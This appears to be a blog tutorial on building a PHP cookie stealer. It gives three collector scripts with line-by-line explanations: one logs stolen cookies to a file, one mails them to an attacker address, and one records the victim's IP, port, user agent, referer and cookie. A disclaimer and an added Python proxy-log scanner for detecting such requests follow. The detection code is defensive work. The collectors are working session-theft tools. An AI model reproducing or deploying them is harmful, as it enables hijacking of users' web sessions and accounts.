How to create a cookie stealer in PHP?



Here is a simple cookie stealer.
First version: the cookie is stored in a file:
<?php
$cookie = $HTTP_GET_VARS[“cookie”];
$steal = fopen(“cookiefile.txt”, “a”);
fwrite($steal, $cookie .”\n”);
fclose($steal);
?>


$cookie = $HTTP_GET_VARS[“cookie”]; takes the cookie from the current URL (stealer.php?cookie=x) and stores it in the $cookie variable.
$steal = fopen(“cookiefile.txt”, “a”); opens cookiefile.txt in append mode so that each stolen cookie is added to the end of the file.
fwrite($steal, $cookie .”\n”); writes the stolen cookie to the file.
fclose($steal); closes the opened file.
Another version: sends the cookies to the hacker's mail

<?php
$cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);
?>
The above code mails the cookies to the hacker's mail address using the PHP mail() function, with the subject “Stolen Cookies”.
Third version

<?php
function GetIP()
{
    if (getenv(“HTTP_CLIENT_IP”) && strcasecmp(getenv(“HTTP_CLIENT_IP”), “unknown”))
        $ip = getenv(“HTTP_CLIENT_IP”);
    else if (getenv(“HTTP_X_FORWARDED_FOR”) && strcasecmp(getenv(“HTTP_X_FORWARDED_FOR”), “unknown”))
        $ip = getenv(“HTTP_X_FORWARDED_FOR”);
    else if (getenv(“REMOTE_ADDR”) && strcasecmp(getenv(“REMOTE_ADDR”), “unknown”))
        $ip = getenv(“REMOTE_ADDR”);
    else if (isset($_SERVER[‘REMOTE_ADDR’]) && $_SERVER[‘REMOTE_ADDR’] && strcasecmp($_SERVER[‘REMOTE_ADDR’], “unknown”))
        $ip = $_SERVER[‘REMOTE_ADDR’];
    else
        $ip = “unknown”;
    return($ip);
}
function logData()
{
    $ipLog=”log.txt”;
    $cookie = $_SERVER[‘QUERY_STRING’];
    $register_globals = (bool) ini_get(‘register_gobals’);
    if ($register_globals) $ip = getenv(‘REMOTE_ADDR’);
    else $ip = GetIP();
    $rem_port = $_SERVER[‘REMOTE_PORT’];
    $user_agent = $_SERVER[‘HTTP_USER_AGENT’];
    $rqst_method = $_SERVER[‘METHOD’];
    $rem_host = $_SERVER[‘REMOTE_HOST’];
    $referer = $_SERVER[‘HTTP_REFERER’];
    $date=date (“l dS of F Y h:i:s A”);
    $log=fopen(“$ipLog”, “a+”);
    if (preg_match(“/bhtmb/i”, $ipLog) || preg_match(“/bhtmlb/i”, $ipLog))
        fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>”);
    else
        fputs($log, “IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie nn”);
    fclose($log);
}
logData();
?>
The above cookie stealer will store the following information:
  • IP address
  • port number
  • host (usually the computer name)
  • user agent
  • cookie
This article is for educational purposes only, written for ethical hackers. It is meant to create public awareness about Internet risks.
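From the defender's side, every version above receives the cookie in the query string of a GET request (stealer.php?cookie=x), so the request is visible in web proxy logs. The following is an added example, not part of the original article: it scans proxy log lines for requests that leave one of your own pages for a foreign host with a session cookie name in the query string. The log format, host names and cookie names are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumptions for this example: your session cookie names and your own hosts.
SESSION_COOKIE_NAMES = ("PHPSESSID", "JSESSIONID")
OWN_HOSTS = {"shop.example.com"}

# A cookie name at the start of the query or right after a separator, then "=value".
COOKIE_PAIR = re.compile(
    r"(?:^|[=;&\s])(" + "|".join(map(re.escape, SESSION_COOKIE_NAMES)) + r")=[^;&\s]+",
    re.IGNORECASE,
)

def cookie_in_query(url):
    """Return the session cookie name carried in url's query string, or None."""
    query = urlsplit(url).query
    for _ in range(2):  # decode twice to catch double URL-encoding
        query = unquote(query)
    match = COOKIE_PAIR.search(query)
    return match.group(1) if match else None

def scan_proxy_log(lines):
    """Return findings for requests that go from a page on OWN_HOSTS to a
    foreign host with a session cookie in the query string."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines
        timestamp, client_ip, method, url, referer = fields
        dest = (urlsplit(url).hostname or "").lower()
        origin = (urlsplit(referer).hostname or "").lower()
        if not dest or dest in OWN_HOSTS or origin not in OWN_HOSTS:
            continue  # only own-page -> foreign-host requests are of interest
        name = cookie_in_query(url)
        if name:
            findings.append({"time": timestamp, "client": client_ip, "dest": dest, "cookie": name})
    return findings

# Constructed sample lines, format: timestamp client method url referer
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z 10.0.0.5 GET http://collector.example.net/stealer.php?cookie=PHPSESSID%3Dabc123%3B%20theme%3Ddark http://shop.example.com/item?id=7",
    "2024-01-01T10:00:02Z 10.0.0.5 GET http://collector.example.net/log.php?PHPSESSID=abc123 http://shop.example.com/item?id=7",
    "2024-01-01T10:00:05Z 10.0.0.6 GET http://cdn.example.org/app.js?v=3 http://shop.example.com/",
    "2024-01-01T10:00:09Z 10.0.0.7 GET http://shop.example.com/cart?PHPSESSID=zzz -",
]

if __name__ == "__main__":
    for finding in scan_proxy_log(SAMPLE_LOG):
        print(finding)
```

This is a triage heuristic: a foreign site that carries its own session ID in URLs under the same cookie name will also match, so confirm a hit before invalidating the affected session.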
 
Dhirendra Biswal

Hi. I'm Dhirendra, the admin of this blog. I'm a Certified Ethical Hacker and also a web developer with programming skills in various programming languages.
